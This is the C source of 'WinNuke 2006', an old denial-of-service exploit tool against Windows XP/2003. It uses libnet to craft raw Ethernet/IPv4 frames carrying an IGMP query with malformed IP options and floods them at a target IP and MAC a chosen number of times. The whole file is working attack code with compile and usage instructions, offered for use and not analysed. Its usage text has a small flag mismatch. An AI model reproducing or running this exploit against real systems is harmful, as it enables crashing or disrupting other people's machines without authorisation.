/*
 *
 *  winnuke2006.c
 * 
 * 	WinXP/2003 Nuke
 * 	
 *	Requre : libnet, root privileges
 *	Compile: gcc -o winnuke2006 winnuke2006.c -lnet
 *	Usage  : ./winnuke2006 -h 
 *
 *	23 Mar 2006 by insa
 */

#include <libnet.h>

int send_raw_ether(
		char * src_mac, char * src_ip, 
		char * dst_mac, char * dst_ip, 
		char * msg, int msg_s, int count) {

	int c, n;
	libnet_t *l;
	libnet_ptag_t igmp, t;
	char errbuf[LIBNET_ERRBUF_SIZE];
	u_int32_t s_ip, d_ip;
	u_int8_t *s_mac, *d_mac;

	int * s_mac_len = malloc(sizeof(int));
	int * d_mac_len = malloc(sizeof(int));
	
	//here goes our magic string
	char ipopt[] = { 0x00, 0x00, 0x00, 0x00};
	int ipopt_s = 4;
	
	l = libnet_init(LIBNET_LINK, NULL, errbuf);
	if (l == NULL) {
		fprintf(stderr, "libnet_init() failed: %s", errbuf);
		return 1;
	}

	s_ip = libnet_name2addr4(l, src_ip, LIBNET_RESOLVE);
	d_ip = libnet_name2addr4(l, dst_ip, LIBNET_RESOLVE);

	s_mac = libnet_hex_aton(src_mac, s_mac_len);
	d_mac = libnet_hex_aton(dst_mac, d_mac_len);

	if (s_ip == -1 || d_ip == -1) 
		return 1;
	igmp = 0;
	igmp = libnet_build_igmp (
			0x11,					/* igmp membership query */
			0,						/* code */
			0,						/*checksum = 0*/
			0,						/*ipv4 address*/
			msg,					/*payload*/
			msg_s,					/*payload size*/
			l,						/*libnet handle*/
			igmp);					/*libnet id*/
	if (igmp == -1) {
		fprintf(stderr, "Can't build IGMP header: %s\n", libnet_geterror(l));
		return 1;
	}
	
	t = libnet_build_ipv4_options (ipopt, ipopt_s, l, 0);

	if (t == -1) {
		fprintf(stderr, "Can't write IPV4 header OPTIONS: %s\n", libnet_geterror(l));
		return 1;
	}

	t = libnet_build_ipv4 (
			LIBNET_IPV4_H + ipopt_s + LIBNET_IGMP_H + msg_s,
			0,				/*tos*/
			0,  		    /*seq*/
			0,				/*frag*/
			64,			    /*ttl*/
			IPPROTO_IGMP,
			0,				/*csumm*/
			s_ip,
			d_ip,
			NULL,
			0,
			l,
			0);
	if (t == -1) {
		fprintf(stderr, "Can't build IPV4 header: %s\n", libnet_geterror(l));
		return 1;
	}

	t = libnet_build_ethernet(
			d_mac,
			s_mac,
			ETHERTYPE_IP,
			NULL,
			0,
			l,
			0);
	if (t == -1) {
		fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
		return 1;
	}

	//send:	
	for (n = 0; n < count; n++) {
	
		//debug
		//libnet_diag_dump_pblock(l);
		
		c = libnet_write(l);
		if (n % 10 == 0)
			fprintf(stderr, ".");
		
		if (c == -1) {
			fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
			return 1;
		}//if
	
	}//for
	
	fprintf(stderr, "\n");
	
	libnet_destroy(l);

	//little cleanup
	free(s_mac_len);
	free(d_mac_len);
	free(s_mac);
	free(d_mac);

	return 0;

}//send_raw_ether

void usage(void) {
	
	fprintf(stderr, "Usage: winnuke2006 [-s source ip] [-m source mac] [-d destination ip] [-m dest mac] [-c count]\n\n");
	exit (1);

}

int main (int argc, char ** argv) {
	
	int count = 1;
	
	char * src_mac = "00:01:02:03:04:05";
	char * dst_mac = "00:02:04:06:08:0A";

	char * src_ip = "192.168.1.1";
	char * dst_ip = "192.168.1.2";
	
	int rc;
	
	//igmp payload
	char msg[] = { 
		0x00, 0x00, 0x00, 0x00
	};
	int msg_s = 4;
	
	int ch;

	fprintf(stderr, "\nWinNuke 2006 by insa.\n");
	
	while ((ch = getopt(argc, argv, "hc:s:d:m:n:")) != EOF) {
		
		switch (ch) {
			case 'h':
				usage();

			case 'c':
				count = atoi(optarg);
				break;
			case 's':
				src_ip = optarg;
				break;
			case 'd':
				dst_ip = optarg;
				break;
			case 'm':
				src_mac = optarg;
				break;
			case 'n':
				dst_mac = optarg;
				break;
			default:
				usage();
		}
	}
	
	fprintf(stderr, "Sending %d packets from %s (%s) to %s (%s):\n", count, src_ip, src_mac, dst_ip, dst_mac);
	
	rc = send_raw_ether(src_mac, src_ip, dst_mac, dst_ip, msg, msg_s, count);
	
	if (rc != 0)
		fprintf(stderr, "Send failed.\n\n");
	else
		fprintf(stderr, "Packets sent.\n\n");
	return rc;
}
//EOF
